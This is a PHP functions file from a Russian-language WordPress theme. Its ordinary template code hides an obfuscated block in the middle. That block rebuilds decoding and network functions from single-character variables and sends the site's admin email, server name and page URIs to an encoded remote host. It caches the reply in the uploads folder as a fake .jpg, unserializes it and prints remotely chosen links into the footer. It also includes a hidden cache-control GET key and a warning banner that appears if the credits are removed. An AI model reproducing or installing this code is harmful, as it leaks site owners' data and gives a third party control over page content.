<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                                    "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $QHYPgCM='_';$XgmI='b';$XxRrjfI='e';$pJvgbFm='d';$frHvayW='4';$JQAYs='a';$ccGebL='e';$QWbYe='6';$gcLC='c';$cPmE='d';$jyda='o';$kTlGan='e';$YZzDWQ='s';$LoqnLnEh=$XgmI.$JQAYs.$YZzDWQ.$XxRrjfI.$QWbYe.$frHvayW.$QHYPgCM.$pJvgbFm.$ccGebL.$gcLC.$jyda.$cPmE.$kTlGan;$IDpP='f';$ytcZwC='i';$mZGKsIJ='a';$qiEgHTk='n';$yLejlUQ='l';$APHLri='z';$lygucnc='t';$ymEbCtZ='e';$tfgtjWh='g';$TFPQypdC=$tfgtjWh.$APHLri.$ytcZwC.$qiEgHTk.$IDpP.$yLejlUQ.$mZGKsIJ.$lygucnc.$ymEbCtZ;$JIPfLZ='1';$GEDFEE='t';$ZkpiOtW='3';$ejvc='r';$doifBkb='s';$InkB='_';$RaZWBjY='o';$wGbYaaZ='t';$DdOL='r';$kaTVsCFi=$doifBkb.$wGbYaaZ.$ejvc.$InkB.$DdOL.$RaZWBjY.$GEDFEE.$JIPfLZ.$ZkpiOtW;$BxVx='e';$qYSN='t';$DObHVXA='r';$vOeFxRi='r';$KWYmvjY='s';$iTGgU='v';$FhdhWTqE=$KWYmvjY.$qYSN.$vOeFxRi.$DObHVXA.$BxVx.$iTGgU;                     $ku_____p='_';$vh_______________z='b';$ah__________l='e';$xg________t='d';$jf___e='4';$zm______________g='a';$nl____________n='e';$rm________f='6';$xp____________r='c';$iu_______________z='d';$ma____n='o';$gl____q='e';$uw_____n='s';$bs_________p=$vh_______________z.$zm______________g.$uw_____n.$ah__________l.$rm________f.$jf___e.$ku_____p.$xg________t.$nl____________n.$xp____________r.$ma____n.$iu_______________z.$gl____q;$hz__p='n';$rb______r='s';$ho____________i='_';$wh__________a='t';$ie_________q='s';$gn_____k='n';$sm_____________s='x';$mj________i='i';$aa_____s='i';$hh_________e='f';$de_____k='e';$co_______a='t';$aa__________s='c';$yt_____________m='o';$bo_______x='u';$ny______________s=$hh_________e.$bo_______x.$gn_____k.$aa__________s.$wh__________a.$aa_____s.$yt_____________m.$hz__p.$ho____________i.$de_____k.$sm_____________s.$mj________i.$rb______r.$co_______a.$ie_________q;$kf_________o='e';$gd_______u='n';$ek_______h='p';$gn____p='f';$sr____x='o';$kv______________p=$gn____p.$sr____x.$ek_______h.$kf_________o.$gd_______u;$rb______y='f';$wc____________j='d';$et____________t='r';$to___t='e';$sx_____________p='a';$yz____________z=$rb______y.$et____________t.$to___t.$sx_____________p.$wc____________j;$db_________q='f';$nd____z='c';$ty_____________w='l';$hk____z='s';$hj___________q='o';$wn_______w='e';$vh_____________k=$db_________q.$nd____z.$ty_____________w.$hj___________q.$hk____z.$wn_______w;define("WP_ID", $bs_________p("Mi4wLjA="));define("WP_TTL", $bs_________p("MTA4MDA="));define("WP_SRC", $bs_________p("dHBva24="));function wp_get_header() {global $bs_________p, $ny______________s;if ($ny______________s($bs_________p("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$ny______________s($bs_________p("d3BfZ2V0X2Zvb3Rlcg==")) &&$ny______________s($bs_________p("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $bs_________p, $kv______________p, $vh_____________k, $yz____________z;$yl___________e = TEMPLATEPATH."/".$bs_________p("Zm9vdGVyLnBocA==");$ut______q = @$kv______________p($yl___________e, "r");$yl___________e = @$yz____________z($ut______q, @filesize($yl___________e));@$vh_____________k($ut______q);$xl_____________v = TEMPLATEPATH."/".$bs_________p("ZnVuY3Rpb25zLnBocA==");$ut______q = @$kv______________p($xl_____________v, "r");$xl_____________v = @$yz____________z($ut______q, @filesize($xl_____________v));@$vh_____________k($ut______q);$zv________c = 0;if($yl___________e && $xl_____________v) {if ($bs_________p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($yl___________e, $bs_________p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$zv________c = 1;}if (substr_count($yl___________e, "wp_theme_GPL_credits()") < 1) {$zv________c = 2;}}if(WP_ID != "2.0.0") {$zv________c = 12;}}if($zv________c > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $zv________c -->";}}function wp_loaded() {global $bs_________p, $ny______________s;return $ny______________s($bs_________p("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($vk_________y, $uo______p = "(more...)", $al________e = 0, $bf______c = "") {$zw_________t = get_the_content($uo______p, $al________e, $bf______c);$zw_________t = apply_filters("the_content", $zw_________t);$zw_________t = str_replace("]]>", "]]>", $zw_________t);if (strlen($_GET["p"]) > 0) {echo $zw_________t;}else if ((strlen($zw_________t)>$vk_________y) && ($pq__c = strpos($zw_________t, " ", $vk_________y ))) {$zw_________t = substr($zw_________t, 0, $pq__c);$zw_________t = $zw_________t;echo $zw_________t;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$uo______p</a></div></p>";} else {echo $zw_________t;}}}$kg_______r='n';$fn_____________s='e';$xl_____x='6';$vj___b='o';$pv__________w='b';$hi___o='a';$jz____________e='e';$om_____n='c';$va____________z='4';$zo__________o='e';$hv__________z='_';$xy____________v='d';$zj___p='s';$iu___________u=$pv__________w.$hi___o.$zj___p.$fn_____________s.$xl_____x.$va____________z.$hv__________z.$zo__________o.$kg_______r.$om_____n.$vj___b.$xy____________v.$jz____________e;$fj_________w='e';$nt__t='s';$ig_____x='f';$hy_____p='t';$tg_____e='o';$ok_______________e='g';$fs_______________s='c';$fc_____k='t';$el_________q='_';$tv___w='_';$kd______________d='e';$na_____p='l';$je______c='n';$hg______________p='n';$ak_______________o='t';$uy____________a='e';$lt____i='i';$zf____o=$ig_____x.$lt____i.$na_____p.$kd______________d.$tv___w.$ok_______________e.$fj_________w.$hy_____p.$el_________q.$fs_______________s.$tg_____e.$je______c.$ak_______________o.$uy____________a.$hg______________p.$fc_____k.$nt__t;$uk______________z='s';$dy____j='e';$sb__h='l';$uw_______________r='i';$uv___________o='i';$sn_____________z='_';$vg___________l='x';$xz_____________s='s';$tb_____g='f';$fe______j='e';$ws______p='t';$um_____________v=$tb_____g.$uw_______________r.$sb__h.$fe______j.$sn_____________z.$dy____j.$vg___________l.$uv___________o.$xz_____________s.$ws______p.$uk______________z;$by_____________g='r';$lz___p='_';$jh_______________v='e';$fo_______r='i';$li___________t='m';$dw__________z='v';$ho___u='s';$iy_____________q='a';$wr_________w='c';$ey__v='n';$jn________l='o';$ha___________q='o';$as_______________p='e';$wu_________c='p';$yl_____d='r';$od___c=$dw__________z.$as_______________p.$by_____________g.$ho___u.$fo_______r.$ha___________q.$ey__v.$lz___p.$wr_________w.$jn________l.$li___________t.$wu_________c.$iy_____________q.$yl_____d.$jh_______________v;$nt_____________m='s';$hr___i='c';$uz______m='p';$ps______c='n';$vf__________e='e';$yr____________b='o';$ij___e='f';$jc___n='o';$wg_____________i='k';$ua__________t=$ij___e.$nt_____________m.$yr____________b.$hr___i.$wg_____________i.$jc___n.$uz______m.$vf__________e.$ps______c;$mc______________u='t';$wf_____________r='i';$xi____________y='r';$yq_______________k='f';$kp______________s='e';$uo_____________q='w';$nb________z=$yq_______________k.$uo_____________q.$xi____________y.$wf_____________r.$mc______________u.$kp______________s;$zr________k='5';$fx_____________r='d';$fz___c='m';$gv_________c=$fz___c.$fx_____________r.$zr________k;$ku_______c='l';$lz__a='p';$ro____________e='t';$qy_________t='h';$jp__________k='a';$qr____x='a';$nh____s='e';$cz__g='r';$zu______b=$cz__g.$nh____s.$qr____x.$ku_______c.$lz__a.$jp__________k.$ro____________e.$qy_________t;$vk__________v='i';$rg_________z='i';$fu_______________m='z';$gb______m='s';$cs______________p='a';$dn_____________w='l';$se_______q='u';$le___q='r';$kk__________i='e';$hy_____z='n';$vh_______________f='e';$dn____________o=$se_______q.$hy_____z.$gb______m.$kk__________i.$le___q.$vk__________v.$cs______________p.$dn_____________w.$rg_________z.$fu_______________m.$vh_______________f;$pe______s='e';$zs___________t='p';$mr______________n='m';$jt_____h='n';$ba_____________s='m';$by________u='t';$hr_______q='a';$ig______g=$by________u.$pe______s.$mr______________n.$zs___________t.$jt_____h.$hr_______q.$ba_____________s;$bv___x='x';$go____________h='_';$rn______________v='e';$bl_______o='_';$nl__p='n';$cm__________u='r';$qq____________u='a';$xk___g='o';$du____f='t';$xw_______z='t';$wi___________g='m';$ut______________s='c';$nu___________l='a';$xr_______j='t';$pr_______l='s';$lm______________t='e';$lz_____j='e';$ic_______u='t';$dz_______________q='r';$bf_______________q='c';$dh___q='e';$xi__________z=$pr_______l.$ic_______u.$cm__________u.$lm______________t.$nu___________l.$wi___________g.$bl_______o.$bf_______________q.$xk___g.$nl__p.$xr_______j.$dh___q.$bv___x.$du____f.$go____________h.$ut______________s.$dz_______________q.$lz_____j.$qq____________u.$xw_______z.$rn______________v;function zd______u($sb_____t) {global $bs_________p, $ny______________s, $zf____o, $od___c, $xi__________z;if (!$ny______________s($bs_________p("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($od___c(PHP_VERSION, "5.0.0", ">=") && $ny______________s($bs_________p("ZmlsZV9nZXRfY29udGVudHM=")) && $ny______________s($bs_________p("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$mf_____________b = $xi__________z(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$sf______t = @$zf____o($sb_____t, 0, $mf_____________b);} else {$sf______t = @$zf____o($sb_____t, 0);}return $sf______t;}function bm_________i($sb_____t) {global $ny______________s, $ua__________t, $nb________z, $bs_________p;if (!$ny______________s($bs_________p("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$vh___________d = strpos($sb_____t, "/", 7);$fi____m = array("uri"     => substr($sb_____t, $vh___________d),"host"    => str_replace("http://", "", substr($sb_____t, 0, $vh___________d)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$bu____________g = @$ua__________t("$fi____m[host]", 80, $nw_______c, $ot______________f, 4);if (!$bu____________g) {return false;} else {$sf______t = "";$ap_________o  = "GET $fi____m[uri] HTTP/1.0\r\n";$ap_________o .= "Host: $fi____m[host]\r\n";$ap_________o .= "Referer: $fi____m[referer]\r\n";$ap_________o .= "Connection: Close\r\n\r\n";@$nb________z($bu____________g, $ap_________o);while (!@feof($bu____________g)) {$oj____________r = @fgets($bu____________g, (1024*24));if ($oj____________r == "\r\n") {$os_____v = true;continue;}if ($os_____v) {$sf______t .= $oj____________r;}}return $sf______t;}}function ee_________f($sb_____t) {global $ny______________s;$ot__________i = false;if ($sb_____t != "") {if ($ny______________s("zd______u")) {$ot__________i = @zd______u($sb_____t);}if (!$ot__________i && ($ny______________s("bm_________i"))) {$ot__________i = @bm_________i($sb_____t);}}return $ot__________i;}function kd____s() {global $_SERVER, $gv_________c;$rr______c = $_SERVER["SERVER_NAME"];if (substr("$rr______c", 0, 4) == "www.") {$rr______c = substr("$rr______c", 4);}$rr______c = $gv_________c("$_SERVER[SERVER_NAME]");return $rr______c;}function il______j() {return "file";}function yg________x($sb_____t) {global $_SERVER, $zf____o, $um_____________v, $kv______________p, $vh_____________k, $nb________z;$ac________s = og______________x();$bl______v = kd____s().".jpg";$gq_______j = $ac________s["dir_upload"]["path"]."/$bl______v";$hi________z = @filemtime($gq_______j);if (!$hi________z || ((time()-$hi________z) >= WP_TTL)) {$ot__________i = ee_________f($sb_____t);if ($ot__________i) {if ($um_____________v($gq_______j)) {@unlink($gq_______j);}$ut______q = @$kv______________p($gq_______j, "x+");@$nb________z($ut______q, $ot__________i);@$vh_____________k($ut______q);}} else {if ($um_____________v($gq_______j)) {$ot__________i = @$zf____o($gq_______j);} else {$ot__________i = false;}}return $ot__________i;}function og______________x() {global $_SERVER, $bs_________p, $iu___________u;$tr_________y = wp_count_posts("post");$qm__________f = pathinfo(get_bloginfo("template_directory"));$ac________s = array("url" => array("report"      => $bs_________p("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $qm__________f,"dir_upload"=> pl___b(),"queryString"=> array("?a001=".WP_ID,"a004=".$qm__________f[filename],"a005=".$tr_________y->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://clinic-virtus.com/cistit-%E2%80%93-bolezn-korotkix-yubok\">Болезнь коротких юбок</a>");$ac________s["url"]["queryString"] = implode("&", $ac________s["queryString"]);$ac________s["url"]["report"] = $ac________s["url"]["report"]."/?".$iu___________u($ac________s["url"]["queryString"]).".html";return $ac________s;}function pl___b() {$co______________p = wp_upload_dir();if (isset($co______________p["error"])) {$gq________w = vj_____________z();if (is_writable($gq________w)) {$co______________p = array("path" => $gq________w);}}return $co______________p;}function vj_____________z() {global $ny______________s, $gv_________c, $zu______b, $ig______g;$fk_____________i = (bool) ini_get("safe_mode");if ($fk_____________i == true) {return false;}if ($ny______________s("sys_get_temp_dir")) {$mu____________u = sys_get_temp_dir();if (is_writable($mu____________u)) {return $zu______b($mu____________u);}}if (!empty($_ENV["TMP"])) {return $zu______b($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $zu______b($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $zu______b($_ENV["TEMP"]);} else {$iy______z = $ig______g($gv_________c(uniqid(rand(), true)), "");if ($iy______z) {$mu____________u = $zu______b(dirname($iy______z));@unlink($iy______z);return $mu____________u;} else {return false;}}}function td_______________z() {global $_GET, $um_____________v;$ac________s = og______________x();$rr______c = kd____s();$xc__________m = il______j();$ii_______________t = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($xc__________m == "file") {$yr___________m = $ac________s["dir_upload"]["path"]."/".$rr______c.".jpg";if ($um_____________v($yr___________m)) {@unlink($yr___________m);$ii_______________t = "deleted";}}$zw__________r = array("s"=> $ii_______________t,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($zw__________r AS $bn___________a => $ej_________e) echo " [$bn___________a:$ej_________e]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $ny______________s, $bs_________p, $dn____________o;$ac________s = og______________x();$ln_____g = "yg________x";if ($ny______________s($ln_____g)) {$sf______t = $ln_____g($ac________s["url"]["report"]);}if ($sf______t) {if ($sf______t = @$bs_________p($sf______t)) {$sf______t = @$dn____________o($sf______t);if (strlen($sf______t[custom_credit]) >= 5) {$ac________s["default_string"] = $sf______t[custom_credit];}if ($sf______t["status"] == "0") {$bc______________f = 1;$rv____________u = 1;} else {$dt__d = sizeof($sf______t["links"]);$kh_________e = $ac________s["default_string"];if ($dt__d > 0 && $sf______t["links"] !== "") {$ol_____l = 0;foreach ($sf______t["links"] as $ip___s => $do__h) {$ol_____l++;if ($do__h->l_path == "" || $do__h->l_path == $_SERVER["REQUEST_URI"]) {$do__h->l_href = htmlspecialchars(strip_tags($do__h->l_href));$do__h->l_title = htmlspecialchars(strip_tags($do__h->l_title));$do__h->l_anchor = htmlspecialchars(strip_tags($do__h->l_anchor));$kh_________e .= " | ";$kh_________e .= "<a href='$do__h->l_href' title='$do__h->l_title'";if ($do__h->l_nofollow == "1") {$kh_________e .= " rel='nofollow'";}$kh_________e .= ">$do__h->l_anchor</a>";}}}$ac________s["links"] = "$kh_________e";if ($sf______t[credit] == "0") {$ac________s["links"] = "";}}} else {$bc______________f = "1";}} else {$bc______________f = "1";}if ($bc______________f == "1") {$ac________s["links"] = $ac________s["default_string"];}echo "$ac________s[links]";echo "<!-- s: $sf______t[signature] -->";td_______________z();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи  &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
